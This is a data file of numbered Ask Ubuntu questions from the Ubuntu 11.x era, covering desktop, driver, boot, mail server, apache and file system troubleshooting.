87699	can natuilus setup sshfs like/instead of sftp ?	i have nautilus set up to mount a remote filesystem using sftp . that works fine , so far , but sftp seems to have some issues i find unhelpful : when i overwrite an existing text file , the group read permissions are mysteriously removed on the remote machine . when i try to attach a file to an email by dragging it to thunderbird , i get an sftp : // url which tb ca n't use ( yet , if i open the tb attach dialogue and browse though .gvfs , all is well ) . none of this happens when i manually mount the same filesystem through sshfs . is it possible to configure nautilus to use sshfs ? a plugin maybe ? it does n't appear on the `` connect to server '' list of available options . edit : it 's been pointed out that sshfs uses the sftp protocol as a backend . while that maybe true , the real problem is that accessing files via nautilus is less smooth than mounting via sshfs , and i 'd like to figure out how to get nautilus to do it the nice way .
87703	why does my ubuntu run on low-graphic mode ?	my graphic card is nvidia gtx 460 and i am using ubuntu 10.04 . i have reinstalled graphic driver for two times , but my ubuntu shows that it runs on low-graphic mode after a period of time of driver installation process . the following is the information the computer shows . also , when i try to change the graphic setting of nvidia on ubuntu , the following information shows . how to fix it ?
87704	how can i install software without internet ?	at this moment i have next situation : i have 2 computers : first computer with windows 7 and connection to the internet ; second computer with latest ubuntu 11.10 and without connection to the internet . and , my question next : how in this case i can install new packages on ubuntu ?
87707	music/podcast player with speed control ?	i am looking for a mp3/ogg player that has the ability to playback a file at a higher speed , preferably without affecting the pitch . what players allow that ? the only one i know right now is alsaplayer , but it ca n't do it without affecting the pitch and also has currently a bug that causes it to use 100 % of the cpu at all times , so that renders it kind of unusable . what alternatives are out there ?
87708	how can i update firefox ?	i 'm using ubuntu 11.10 . how can i update firefox ? it 's current version 7 .
87713	how to upload deb files to launchpad ?	i want to upload files on launchpad . i have tried the help method of launchpad but i could n't understand . please tell me the method , how to upload ? please do n't give me any links to read , just tell me method . thanks
87714	can i set my optimus nvidia card to run unity3d with bumblebee ?	i 'd like to know whether i can run compiz on my nvidia card to speed things up . it 's a dell xps15 laptop but i 'm mostly using it as a desktop , so battery life is not important . apparently my intel integrated card is able to run unity 3d , but my nvidia gt 420m is not . here 's the output of unity_support_test , both with optirun and without it : manuhalo @ ubuntu-xps-l501x : ~ $ optirun /usr/lib/nux/unity_support_test -p opengl vendor string : nvidia corporation opengl renderer string : geforce gt 420m/pci/sse2 opengl version string : 4.1.0 nvidia 280.13 not software rendered : yes not blacklisted : yes glx fbconfig : yes glx texture from pixmap : no gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : no manuhalo @ ubuntu-xps-l501x : ~ $ /usr/lib/nux/unity_support_test -p opengl vendor string : tungsten graphics , inc opengl renderer string : mesa dri intel ( r ) ironlake mobile opengl version string : 2.1 mesa 7.11 not software rendered : yes not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : yes any ideas of why this is happening ? thanks in advance to anyone able to shed some light on this . what i have tried : installed the v290 drivers from the x-stable ppa . tried forcing unity-3d to work by telling unity to ignore the unity-support-test results i.e . gksudo gedit /etc/environment add the following unity_force_start=1 to the end of the file .
87715	applications that can be installed and/or run by a non-admin user	most applications do need to be installed by admin because , i believe , they need access to system resources or files otherwise protected from accessing or modifying . at the same time , for example , netbeans or aptana do not need to be installed by an admin ( both use javare ) . so , three questions : 1 ) is there any more or less general method of installing applications from a repository without using sudo by a non-admin user for her only use ? at least those applications that do not require anything special to work . 2 ) what other applications/games etc . that do not require to be installed by admin do you know ? ( i have no idea how broad this question is . ) 3 ) when a java-based application is installed by a non-admin user , does it ( javare ) give the application access to any system files/resources etc . otherwise protected from modifying ? i would think no , but at the same time java was installed by admin , and during installation it may have granted itself access to some resources .
87717	how to access the printer from within wine	how can i have access to my printer from within wine so i can use for example office 2003 to print something . the print already works in ubuntu but am looking into using it from wine .
87723	asus a6 wo n't boot after installation	i installed ubuntu 11.10 ( desctop i386 ) alongside window 7 . after installation notebook do n't boot : after bios loading i see just black screen and blinking cursor and nothing is going on . if i press and hold shift when notebook is loading , i see message `` grub loading . '' and blinking cursor , that 's all . notebook : asus a6 1.7ghz pentiumm/ram 2gb/hdd 60gb/ ati x700 128mb i have 1st partition with win7 ( primary , boot ) , then ubuntu ext4 ( logical ) , then swap ( logical ) and another partition ntfs ( logical ) . ubuntu partition is automatically created by installer . i tried next actions without success ( same result ) : reinstall grub different ways ( https : //help.ubuntu.com/community/grub2 # reinstalling_grub2 ) reverting to grub legacy ( https : //help.ubuntu.com/community/grub2 # reinstalling_grub2 ) reinstall with different distributives : `` ubuntu-11.10-desktop-i386.iso '' and `` ubuntu-11.10-alternate-i386.iso '' when i tried `` ubuntu-11.10-alternate-i386.iso '' second times , i created partition manualy and i made partition for ubuntu primary and bootable . same result . easebcd did n't help . check hdd - no errors , no bad sectors . now i fix mbr and can boot in win7 but still i ca n't load ubuntu . have any tips ?
87727	how do i avoid files being compressed when burning a blu-ray disc ?	on windows 7 or mac os lion i can burn a directory structure to a blu-ray disc without problems , it 's browsable just like any directory structure . but how do i achieve this on ubuntu ? growisofs -z /dev/dvd -r -j /my/files this command will output many lines saying it has compressed and changed the filenames of certain files . i 'm not sure why , maybe too long filenames ? either way , it 's not good . how do i burn a blu-ray disc without touching the directory structure or file names ? i 've also tried using genisoimage -r -j -o file.iso /directory/of/files as is described in the ubuntu community documentation . yet i still get the warnings saying filenames have been compressed . https : //help.ubuntu.com/community/cddvd/burning
87736	zimbra desktop as default email and calendar application	i am reading and looking after this for some time without an answer . i would like to define zimbra desktop as my default e-mail and calendar and contact application in ubuntu 11.10 , how can i do it ? thanks . lf
87737	minimal package to install qt assistant	we are using qt assistant as our help system for a custom application that will run on ubuntu . in building the .deb package , i need to include a `` requires : '' value that makes my package dependent on the qt assistant package being installed . right now i am using qt4-dev-tools , and it works , but this package is huge because it includes a whole lot of other tools that i do n't need at all . what package do i require to get only qt assistant installed ? also , if you could explain how you found the answer , i 'd appreciate it . poking around the ubuntu package search is n't very efficient .. are there some apt-get commands that help here ?
87738	do i need to install a driver for a mobile intel速 4 series express chipset family video ?	i 'm currently running 2 os on my laptop ( hp compaq 420 ) , win 7 ultimate and ubuntu . im just wonderin what is the right graphic driver for mobile intel速 4 series express chipset family . im asking this because after i install ubuntu ( with internet connection ) , it seems like theres no graphic driver installed . when i look at the system info it labels `` unknown '' next to the graphic word .
87742	why does gnome keyring fail to unlock ssh keys every other boot ?	since the 11.10 upgrade gnome-keyring fails to unlock my ssh key every other boot . i have to manually enter ssh key password on ssh connect . if i logout of the session and login back in it fixes the problem . i am using gnome-fallback , any suggestions ?
87744	how to make downloads folder behave like a temp directory	in order to reduce disk space usage , i want to automate a temporary clean in my downloads folder . i figured two ways to do so : 1 ) changing the configurations of firefox , etc . to save files to /tmp/ ( this would require , for safety , changing the variable tmptime in /etc/default/rcs to 7 or more days ) ; 2 ) turning the ~/downloads folder into a temporary directory that behaves similarly to /tmp/ , deleting old files . the problem is that in /tmp files are indiscriminately deleted in the end of the session ; in ~/downloads folder it would be better to delete files by their creation date . i 'm not very sympathetic to the first option , since it requires a lot of config . i 'd like some help to implement the second one . what 's the best way to do it ?
87747	how to get a new version of a system file that i have messed up	is it possible to somehow get a new 'gnome-shell.css ' file for the adwaita theme . the file is located in /usr/share/gnome-shell/theme and i have messed mine up ( i forgot to make a backup first ) . do i need to reinstall gnome shell completely to do this ?
87749	3 monitors on a gt 430 ?	will a card like the gt 430 which has 1x dvi , 1x vga , and 1x hdmi ports allow me to connect 3 monitors to it giving me a large desktop spanning 3 screens ? assuming i have 3 vga monitors and get the following adapters for the graphics card : dvi to vga hdmi to vga
87755	launcher disappeared , ccsm does not exist	there are lot 's of posts similar to this , but i 'm going to start a new thread because there seem to be a few things unique here . first of all , i have been using 11.10 for over a month with the unity desktop . i was n't playing around with desktop settings or anything , just normal use . one morning i boot up and the launcher is not there . all i have is the folder explorer menu bar permanently in the top menu slot . file edit view go bookmarks help no gear no systems menu left/right-click on desktop - no option for launcher . ccsm at terminal says not installed . following directions to install does nothing . following online tutorials like http : //www.tuxgarage.com/2011/04/missing-top-and-side-panels-in-unity.html compiz ( core ) - warn : failed to receive configurenotify event on 0x3400001 even attempting to completely remove unity in favour of gnome following the link failed : http : //linux-software-news-tutorials.blogspot.com/2011/10/ubuntu-1110-oneiric-remove-unity-and.html ( gconf-editor:9005 ) : gtk-warning ** : failed to load type module : ( null ) ( gconf-editor:9005 ) : glib-gobject-warning ** : g_object_get_valist : property `type ' of object class `gconfeditorwindow ' is not readable now my computer wo n't even get to the login page on that partition . fortunately , i have a clone partition and from the working partition , can mount the binky one to access files . any idea what could have caused such a major malfunction in ccsm and how to fix it ?
87757	why dash cant see new installed program ?	i installed eclipse ide on my ubuntu 11.10 : 1 ) to install eclipse need to download eclipse-jee-indigo-sr1-linux-gtk.tar.gz from download page 2 ) untar downloaded archive tar zxvf eclipse-jee-indigo-sr1-linux-gtk.tar.gz 3 ) move to ~/ mv eclipse ~/eclipse . after this i opened dash window and in input field writed eclipse , but - dash found nothing ... why ? maybe , i must add eclipse in some dash programs list or something like this ?
87763	install ubuntu on external drive without removing internal drive ? ( during installation )	all the guides i 've read on installing ubuntu to an external drive strongly recommend unplugging the internal drive before installation . is there a way around this ? i have a macbook pro , and i 'd really prefer not having to open and take my ssd out . given the flexibility of linux , i would imagine there 's a way to ignore the internal drive during the installation . and i 'd at least be interested in the explanation why this is n't possible , if that 's the case : )
87769	email refused - spf , qmail	i 'm using a pre-configured virtual server for sending emails . currently , i 'm responsible for it running well . one recipient refused my email and i was pointed to a page explaining it . but to me it explains nothing at all : abcde1234 rejected a message that claimed an envelope sender address of somebody @ cgc-instruments.de . abcde1234 received a message from 1.2.3.4 that claimed an envelope sender address of somebody @ cgc-instruments.de . however , the domain cgc-instruments.com has declared using spf that it does not send mail through 1.2.3.4 . that is why the message was rejected . in the above i replaced abcde1234 and 1.2.3.4 for the real values . so my server has declared ... maybe it has , how do i find it out without knowing anything about the system ? by running ps i 've learned that there 's qmail running . why are there no config files in /etc ? i 've found them in /var/qmail/control , but there 's nothing like the above there . or is it ?
87772	not able to install extensions from official website	i am using ubuntu 11.10 and have added gnome3 , webupd8/themes/ ppa . but when i go to the official website for extensions i get the following message : you do not appear to have an up to date version of gnome3 . you won't be able to install extensions from here . see the about page for more information . i even enabled ricotz testing ppa but it had lot of conflicts and webupd8 extensions were all removed . on going to website there was no longer that message but strangly there were no extension listed also . so what am i doing wrong here ? how
87781	screensaver / screen off during gparted	i have a dual-boot setup on my pc and i wanted to change the size of the partitions , to slowly migrate to use linux as my main os with windows as secondary . before starting gparted i ran chkdist /f in windows and then rebooted , made sure all is well , and rebooted again with the livecd . i ran gparted and everything seemed okay , i changed partition sizes , and ran it . ( ( note : i got a note about potential grub problem , which i 'm aware of , and i am ready with this gpartedfaq link to fix http : //gparted.org/display-doc.php ? name=help-manual & lang=c # gparted-fix-grub-boot-problem ) ) however , the screen went into screen saver mode , and it wo n't come out of it . i did n't want to reboot mid-operation so i went to sleep leaving it running to finish the operation . it 's now about 8 hours later . the monitor is still on screen saver , and wo n't come off it when i move my mouse or hit anything on my keyboard . i tried the shortcut for the terminal , but the screen wo n't budge . my computer is still running - i have the power light on and the fan is still running . there are no particularly loud noises and i ca n't tell if the hd is running . i saw some other questions about the screen going black after waking up , but that 's not the case for me , and i have no way of checking fdisk or chkdisk or anything while the monitor is black . anyone has any idea ? how can i know if it 's safe to reboot ?
87789	webgl with firefox and chrome	salutations ! so after getting my new lenovo h330 with intel graphics i 've been trying to get some native client applications working . i typically used the only browser to have nacl built in by standard which is of course google chrome . according to the web , intel mesa drivers that my computer came with ( there 's no pci or pcie graphics card ) earlier then 7.9 wo n't work but according to 'chrome : //gui ' my version is 7.11. but never the less i could only get some of these nacl compiled applications working about 7 % of the time . we eventually found it was a problem with the intel mesa graphics not supporting webgl . you may have seen my previous question here on askubuntu . now for the new twist in this saga . for no reason at all i decided to open firefox and test some webgl examples with it . i navigated to http : //www.ibiblio.org/e-notes/webgl/webgl.htm and take a guess what happened ? firefox did work with all the examples i tried and furthermore worked 100 % of the time . i went to the same site back with chrome to find that it did n't work with any of the examples 100 % of the time . as far as i can find there is n't any nacl plugin for firefox so i ca n't test the actual applications that failed with chrome . i tried everything to get chrome to work like disabling the blacklisted gpu filter in about : flags , making sure webgl was enabled and using the latest chrome version . but to no avail . so now . why does firefox play nicely with webgl when chrome just wants to sit in the corner ?
87794	changing default applications to something other than what 's in the drop-down lists	how can i change my default applications in oneiric to a custom application ( not on the list in system info ) ? i 'm not talking about the default applications to open filetypes - i mean the ones that appear in the dash and open when i hit keyboard hotkeys .
87798	how can i watch activity of ubuntu one ?	how can i watch the activity of ubuntu one ? is it possible to see a detailed list of uploads , downloads and so on ? can i see a list of unsynced files ?
87801	ca n't install gnome shell extensions from the extensions.gnome.org site	when i go to extensions.gnome.org to add shell extensions to my ubuntu 11.10 box i am getting a notification that i do n't have an up to date version of gnome shell . however , i installed the version that i have now from the ubuntu repositories just today . does anyone have any thoughts on this ?
87802	wireless works only after reboot after disabling it via hardware keys	i have an asus eee 1005 ha-h which can disable the wireless on some hardware level with fn+f2 . if i reenable it , the gnome network manager tells me that this device is not ready to use . once i reboot , it is back online . how could i reenable it while the computer is still on ? i 'd like to disable it on the fly to save battery power .
87804	protecting samba shares with ubuntu 10.04	i 'm using a linux distribution based on ubuntu 10.04 ( backtrack 5 r1 ) . i successfully managed to create a samba share that is read/write accessible to everyone in my network . i want to protect this share with a username / password combo . any host in my network that can provide this combo can access the share and edit its contents . is this technically feasible ? if yes , how can i do so ?
87805	ulimit and make_sock errors	i 'm trying to configure redmine for ubuntu 11.10 , using this method redmine for 11.10 but ran into some crazy snag somewhere with apache . upon issuing service apache2 restart i get the following errors . * restarting web server apache2 ulimit : 88 : error setting limit ( operation not permitted ) ulimit : 88 : error setting limit ( operation not permitted ) ( 13 ) permission denied : make_sock : could not bind to address 0.0.0.0:80 no listening sockets available , shutting down unable to open logs i have n't been able to make heads or tails of what exactly is going on with apache . i understand what ulimit does ( monitor system wide resource allocation ) but do n't know why setting the limit would not be permitted ? here 's the contents of /etc/apache2/sites-available/default , were the root of the problem might be ... < virtualhost *:80 > serveradmin jd @ neongecko.com documentroot /var/www < directory / > options followsymlinks allowoverride none < /directory > < directory /var/www/ > options indexes followsymlinks multiviews allowoverride none order allow , deny allow from all < /directory > scriptalias /cgi-bin/ /usr/lib/cgi-bin/ < directory `` /usr/lib/cgi-bin '' > allowoverride none options +execcgi -multiviews +symlinksifownermatch order allow , deny allow from all < /directory > errorlog $ { apache_log_dir } /error.log # possible values include : debug , info , notice , warn , error , crit , # alert , emerg . loglevel warn customlog $ { apache_log_dir } /access.log combined alias /doc/ `` /usr/share/doc/ '' < directory `` /usr/share/doc/ '' > options indexes multiviews followsymlinks allowoverride none order deny , allow deny from all allow from 127.0.0.0/255.0.0.0 : :1/128 < /directory > # see # http : //www.modrails.com/documentation/users % 20guide % 20apache.html # for details on what these options do . they will lead to an increase # in memory usage , but significantly reduced access times . # speeds up spawn time tremendously -- if your app is compatible . # rmagick seems to be incompatible with smart spawning passengerspawnmethod smart # keep the application instances alive longer . default is 300 ( seconds ) passengerpoolidletime 300 # additionally keep a copy of the rails framework in memory . if you 're # using multiple apps on the same version of rails , this will speed up # the creation of new railsappspawners . this is n't necessary if you're # only running one or 2 applications , or if your applications use # different versions of rails . railsframeworkspawneridletime 0 # just in case you 're leaking memory , restart a listener # after processing 5000 requests passengermaxrequests 5000 # only check for restart.txt et al up to once every 5 seconds , # instead of once per processed request passengerstatthrottlerate 5 # specify the minimum number of instances passenger can keep # while cleaning idle instances passengermininstances 3 < location /redmine > options indexes -execcgi followsymlinks -multiviews # allowoverride none order allow , deny allow from all # mod_rails # passengeruser redmine # railsenv edoceo_live railsbaseuri /redmine # environment.rb # redmine : :utils : :relative_url_root = `` /redmine '' < /location > < /virtualhost > # then after the virtualhost is loaded , send it a request # to initialize the redmine installation passengerprestart http : //2222.us/redmine edit i got the error log working through some fluke , here is the errors that i am receiving inside error.log , this might provide some insight . [ wed dec 14 12:06:09 2011 ] [ notice ] caught sigterm , shutting down [ wed dec 14 12:06:10 2011 ] [ error ] *** passenger could not be initialized because of this error : unable to start the phusion passenger watchdog because its executable ( /usr/lib/phusion-passenger/agents/passengerwatchdog ) does not exist . this probably means that your phusion passenger installation is broken or incomplete , or that your 'passengerroot ' directive is set to the wrong value . please reinstall phusion passenger or fix your 'passengerroot ' directive , whichever is applicable . [ wed dec 14 12:06:10 2011 ] [ error ] *** passenger could not be initialized because of this error : unable to start the phusion passenger watchdog because its executable ( /usr/lib/phusion-passenger/agents/passengerwatchdog ) does not exist . this probably means that your phusion passenger installation is broken or incomplete , or that your 'passengerroot ' directive is set to the wrong value . please reinstall phusion passenger or fix your 'passengerroot ' directive , whichever is applicable . [ wed dec 14 12:06:10 2011 ] [ notice ] apache/2.2.20 ( ubuntu ) phusion_passenger/3.0.11 php/5.3.6-13ubuntu3.2 with suhosin-patch configured -- resuming normal operations
87808	any tarball autoinstaller out there ?	can any one help me ? the big problem of linux is that you have to type to install most of the apps ! i 'm searching for an application which can automatically install tarballs just by clicks ( no linuxigeekly typing ! ) is there any thing like that ? ? ?
87809	exit ubuntu splash screen	is there a way to exit the splash screen during boot and view the verbose boot without rebooting ? for future viewers sake : this is for grub2 on ubuntu .
87812	enable dragging between workspaces , gnome-shell	i finally got around to installing ubuntu 11.10 on my laptop . i played around with unity for a while , but was n't a fan , so i installed gnome-shell . on my ubuntu 11.04 machine i was able to drag a window to the edge of the current workspace and have it switch workspaces . how can i achieve this same functionality in gnome-shell ?
87817	how to correctly create a virtual file system ?	a task in my homework assignment asks me to create a virtual file system , mount it , and perform some operations on it . i am supposed to create a file of 10 mb whose bits are all set to 0 , format it as ext3 and mount it . this is how i 've done that : dd if=/dev/zero of=~/filesyst bs=10485760 count=1 sudo mkfs.ext3 ~/filesyst sudo mount âo loop ~/filesyst /media/fuse even though i 've used /dev/sero , the file i still full of gibberish characters ( mostly at-signs ) . the permissions on /media/fuse are drw-rw-rw- ( which are alright ) , but the permissions on the files inside it are something like this : d ? ? ? ? ? ? ? ? ? ? ? ? ? ? lost+found - ? ? ? ? ? ? ? ? ? ? ? ? ? ? secret_bin where have i gone wrong ?
87818	lightdm will not start	having recently installed ubuntu 11.10 on a new computer after approximately a week of use i experienced a freeze on start-up . i think some updates where installed on previous session but i ca n't remember for sure . rebooting the without splash screen i receive two errors stopping automatic crash report generation [ fail ] which seems to be unimportant according to a quick google . second error starting lightdm display manger [ fail ] heading to the console dmesg gives me vboxpci:10 mmu not found ( not registered ) init : lightdm main process terminated google suggests to me that this is the kernel checking if my motherboard has iommu , which i guess is used in virtual machines , guessing from google results . ( for reference its a gigabyte h67 usb3 b3 ) . trying to start lightdm again from command line does not help , same results . i 'm stuck , why is lightdm requiring a virtual machine ? , ( or am i missinterpreting ? ) . what 's going on ? any suggestions to help me to get my system to reboot . thanks t edit : just noticed this on dmesg too , do n't know how i missed it . init : plymouth stop pre start process terminated with status 1
87828	how to get mythtv full screen in unity ?	i am running mythtv in ubuntu 11.10 but i still have the top panel showing on my tv . how can i fix this ? a while back i found some instructions to hide to top bar : to get it to display without a top border : install compizconfig settings manager navigate to utility then workarounds enable legacy fullscreen support but that no longer works . any ideas ?
87829	how to set nautilus to -- no-desktop via gconf	i need to set -- no-desktop via gconf for nautilus , i use openbox . i used to just set it like this # disable nautilus desktop . gconftool-2 -s -t bool /apps/nautilus/preferences/show_desktop false & # do not let nautilus set the background image . gconftool-2 -s -t bool /desktop/gnome/background/draw_background false & however , i find this does not work in ubuntu 11.10 . has something changed in gconf ? might it have anything to do with gsettings ? in the mean time , i just added -- no-desktop to my .desktop shortcuts . this is not a solid long term solution for me , for a few reasons . anytime you upgrade the nautilus package , those changes will overwrite . much more importantly , anything that launches nautilus another way wont use -- no-desktop . if anyone can help , it would be much appreciated . btw : gconf-editor let me view my settings , but no schema for nautilus even existed .
87836	what is the best shell command for port state ?	let 's say , i 'd like to know whether certain port ( e.g . 21 ) is open or closed . what is the best shell command for that ?
87843	how can i update diskless installation 11.04 to 11.10	bonjour messieurs , we have installed on our ubuntu server 64bit in directory /mnt the distribution of ubuntu 11.04 32 bit as shared drive for pxe diskless computers in school . can we upgrade to 11.10 ? how ? can we use nfs 4.0 ? is it recommended ? can we use ubuntu software center and install packages with the gui ? is possible to use 1 gbit connection between nfs pxe server and diskless computers ? i 'm not linux expert , but i hope it is possible . our admin said , do not use gui packager in 11.04 , there is some nfs locking problem . i hope that 11.10 is the general solution . in the fact , we have hdds in all computers and we are using them for swapping only . the idea is to have only one installation for all computers in the school for easier servicing .
87846	how to run dockbarx under unity and gnome-shell ?	i have installed dockbarx manually from gnome-look , but i ca n't start it when i search for it in the dash ; i only see dockbarx preference . so how do i run it and autostart ( add to startup ) it when ubuntu starts , and how to run it under gnome shell ?
87849	how to enable silent automatic updates for any repository ?	i read here how to enable silent automatic updates for google chrome . however , i have other repositories like spotify , docky and others for which i would like to enable silent updates . i am trying to do this in my ubuntu 10.04 system . but this question applies to all ubuntu versions . i have the unattended-upgrades package installed . how can i do this ?
87851	how to push specific bits into a new file ?	is there any way for me to push specific bits into a new file , without creating temporary files and then concatenating them ? for example , i want to create a 10 octets file , where the first three are set to 4 , the next two to 7 and the final five to 32 . 0000.0100 0000.0100 0000.0100 0000.0111 0000.0111 0010.0000 0100.0000 0010.0000 0010.0000 0010.0000 i need a solution that would allow me to create large files , where specific bits are repeated many times .
87852	dual monitors on dual video cards	i have been trying this to no avail . i am a linux newb , so a step by step explanation would be greatly appreciated . i have two video cards , nvidia geforce 8600 gt . i want a monitor to run on each card , so twinview can not be used because my understanding that is only for single video cards . i went to the system monitors tab and my second display is detected but disabled . so i enabled it by clicking configure . it says switch to xscreen ( requires restart of x server ) and i set up my settings so that the new monitor is to the left of the main one . i apply the changes by updating the xorg.conf file which is what it says to do after you click apply . when i reboot i cant even login to the desktop . the gui is all messed up and goes to the command line . it has to do apparently with the new changes made to the xorg.conf file so i have a back up and just put the old one back and then i can get back to the gui . i have done this several times with several different variations of setting up the monitor and i run into the same problem . i even tried to restart gdm without rebooting and it actually does nothing or resets all the monitor configurations that i made . please help . i would like to use dual monitors in ubuntu .
87853	what is default shell for terminal ?	let 's say , i opened a terminal and entered/executed some shell commands . but i didnt invoke explicitly bash or any other shell . what shell was used by default ?
87859	my system is very slow running ubuntu	i recently installed ubuntu . i was using windows xp for years , then i decided to try linux . this is my computer : 2.40 ghz , 1gb of ram , 64mb gpu . it works great with windows xp and 7 but it is slower than slowpoke in ubuntu . what should i do ?
87869	update manager seems to have moved off screen and is lost from visibilty	one day , when i clicked on the update manager launcher , i could no longer see the application . it seems as though it 's moved off screen or is forever minimized . how can i get to it ? i can alt+tab to it , but when i select it , nothing happens ( i just see the previous window i was on ) . i tried to alt+space to see if i could move it , but the window does n't take focus so i ca n't get it to it . i 've tried rebooting . i can also right click on the launcher and install updates , but i just ca n't see what it 's doing . anyone have suggestions ? thanks in advance
87872	how do i accept the configuration screen that pops up when installing postfix ?	i was trying to install postfix on ubuntu 11.10 for smtp support ... i typed sudo apt-get install postfix and then the installation started . but during installation a configuration screen popped up which requested me to select an option . now the problem is that there is no link to accept an option in the configuration screen , and as i ca n't select an option the installation process stalls . if i exit the terminal and again try to re-install i get a message could not get lock /var/cache/apt/archives/lock -open ( 11. resource temporarily unavailable ) screenshots of the problem :
87874	how do i log myself out of a frozen nx-based session ?	i have a nx-based session that i want killed . can i do it via ssh ? in this session , i ca n't click on anything or use my keyboard . however , the time in the menu bar is still updating . i can disconnect the nx session by going to the nx session administrator , and clicking on `` disconnect session '' , but when i log back in again , the same screenshot usually appears ( sometimes the menu bar at the top does n't appear , and the disconnect session confirmation and the greyness where gnome-do ought to appear is absent ) . i assume i have to totally log myself out , and then do a clean login again . can i do this via ssh , or by going to the physical computer and logging in there ( both of which are working fine ) ? i tried in a separate ssh session the following : $ dbus-send -- session -- type=method_call -- print-reply -- dest=org.gnome.sessionmanager /org/gnome/sessionmanager org.gnome.sessionmanager.logout uint32:1 failed to open connection to `` session '' message bus : /bin/dbus-launch terminated abnormally with the following error : autolaunch error : x11 initialization failed . $ qdbus org.kde.ksmserver /ksmserver org.kde.ksmserverinterface.logout -1 -1 -1 could not connect to d-bus server : org.freedesktop.dbus.error.spawn.execfailed : /bin/dbus-launch terminated abnormally with the following error : autolaunch error : x11 initialization failed .
87877	how do i pause an partal upgrade	i have limited time and i would like to pause it so i can resume at home . so how do i pause it wile its installing packages ? and how do i resume it ? also the wifi is broken at home so it would be great if it will not delete what i have downloaded .
87878	ca n't boot after package updates ( upgrade included 3.0.0-14 kernel upgrade )	i upgraded my system today ( usual minor package updates ) , and have not been able to boot into any 3-0-0-xx kernel since , despite the fact that i was using a 3.0 kernel just fine before today . i checked for questions that covered my problem and i found this question , and i tried the solution , but was still unable to boot . i 've also checked for solutions in the ubuntu bug database but i have n't been able to get any of them to work . when i boot 3.0.0-14 ( or -12 or -13 ) in recovery , all i get is a line like rtc_cmos 00:05 : setting system clock to < blah > and nothing happens after that . there 's no response to keyboard input , including ctrl-alt-delete . does anyone know a solution to this problem ? i 'm booting in an old 2.6.38 kernel for now , but this will start getting obnoxious after i forget that i have to do this . update : the system is indeed totally unresponsive to keyboard input . neither the magic sysrq keys nor the ctrl-alt-f # will work . changing video mode at startup also does not work . there were lots of packages that were upgraded , but the ones that could mess up the boot as far as i could tell would only be the kernel and acipid . i reinstalled those , to no avail .
87887	install cirrus logic cs46xx ( audio card ) drivers	i have two sounds cards , one is the on-board ( it 's via ) the other is cirrus logic cs46xx . this is what lspci shows me : 04:04.0 multimedia audio controller : cirrus logic cs 4614/22/24/30 [ crystalclear soundfusion audio accelerator ] ( rev 01 ) it only show the cirrus logic , cause i disable the via card through bios . this page : http : //es.driverscollection.com/ ? file_id=13152 gives me instructions to install it , but i can follow them because the folders indicates in the page do not matches with the ones that i see in my system . the alsa page : http : //alsa-project.org/main/index.php/matrix : module-cs46xx , also give me instructions , but i do n't understand it . for example , they say : type in a terminal : ./configure but do n't say in what directory . i think that is n't instructions for begginers ... right now i ca n't heard anything . i decide to disable the via audio card , cause i 've read they do n't get along with linux , although i use the integrate via video card . i have ubuntu 11.10
87889	using sftp to transfer a directory ?	when i try to use sftp to transfer a directory containing files , i get an error message : skipping non-regular file directory_name the directory contains a couple of files and two subdirectories . what am i doing wrong . thanks .
87890	how to boot xen vms using iscsi ?	in simple , i want boot xen fully virtualized ( hvm ) guests ( both windows & linux ) using iscsi drives ( i.e . from san ) . my main purpose of this is to learn about this process . so , how can i do it ? how to setup vm / vm config file so that it supports booting from iscsi ? ?
87896	intel 5100 agn disconnects and then disables my verizon fios actiontec router	i am a new user ( my first trial ) of ubuntu and booted up my windows vista laptop up with the ubuntu cd . i was able to connect wirelessly to my router and stay connected for about a minute . after that it would disconnect and my router would be disabled : none of my other wireless devices would see the signal any longer , as if it disappeared . i would have to cycle the router 's power toggle off/on to get it to come back on and put out a signal again . this happened repeatedly . i experienced no other problems trying the software ( i.e. , accessed my files w/o issue ) . i did not attempt to connect with an ethernet cable . here are the specs on my system : laptop is hp pavilion dv5 notebook pc system type is 64-bit operating system cpu is intel core 2 duo p8600 2.4ghz ram is 4 gb network card is intel wifi link 5100 agn i read elsewhere in this forum that 64-bit systems may not be compatible with ubuntu . can anyone help me with this ? i 'd really like to be able to use this op system .
87900	when i try to boot from live cd i get a blank screen help !	i 've created a bootable usb and tried a live cd . both times when i boot from them i can hear the ubuntu drums but have only a blank screen . i have an asus with quad core a6 processor and radeon hd 6720g2 graphics card . what should i do to solve this ? p.s . works fine with wubi .
87903	how to go about troubleshooting frequent system pauses	i have had my desktop that has ran ubuntu over a few years , on my most recent reinstall , periodically ( saying once every 10 minutes or so ) my system will just freeze . mouse wo n't move , keyboard does n't respond , flash video is paused ( the audio usually continues though ) . how do i go about handling this ? the only changes since my last install : i had a new graphics card ( ati radeon 5450 1gb , a huge upgrade from my radeon 3450 256 mb ) , and upgraded ubuntu from 10.10 to 11.04 . this in no way should be it hanging due to hardware constraints , the graphics card is sufficient for 3 monitors ( through eyefinity ) , i only use about 3 of 6 gb of ram at a time , and processing stays under 25 % ( i have a little applet , i can watch it all the time ) . how do i start debugging this and any ideas on a particular problem ?
87907	one ssd , two computers ( with different video cards ) . best approach for video drivers ?	i have a single ssd i dual-boot with windows 7 / ubuntu 11.10 . i switch this drive daily between two computers . one is a laptop with integrated intel graphics . the other is a desktop with an nvidia video card . i want the correct driver to be used and 3d acceleration to be enabled automatically when i boot into ubuntu on either computer . how do i achieve this ? when i boot ubuntu with my laptop most drivers start up normally , but gm965 video driver does n't load , therefore 3d acceleration remains off . the logs show the nvidia driver issuing an error about unavailability ( looks like it 's forcing the nvidia driver ) . is normal that ubuntu 11.10 & xorg nowadays do n't have the same behavior as windows 7 ? when i boot windows 7 the right driver is loaded by pci identification , and resolution settings are loaded via ddc from the monitor . i think xorg can do the same thing like when you boot a live cd . in order to diagnose i need to know how to configure video driver on modern xorg deployments that deprecates /etc/x11/xorg.conf does anyone have any ideas to help me ? thanks in advance
87908	allocating drive space for dual boot	i 've tried installing ubuntu 11.04 along with windows 7 . but i got problem in allocating the drive space for installing ubuntu . i 've 160gb hard disk partitioned into three drives . d and e drives are almost full with data and backups . i 've about 35 gb free in c drive and win7 is installed in drive c. please help me out in allocating drive space for dual boot .
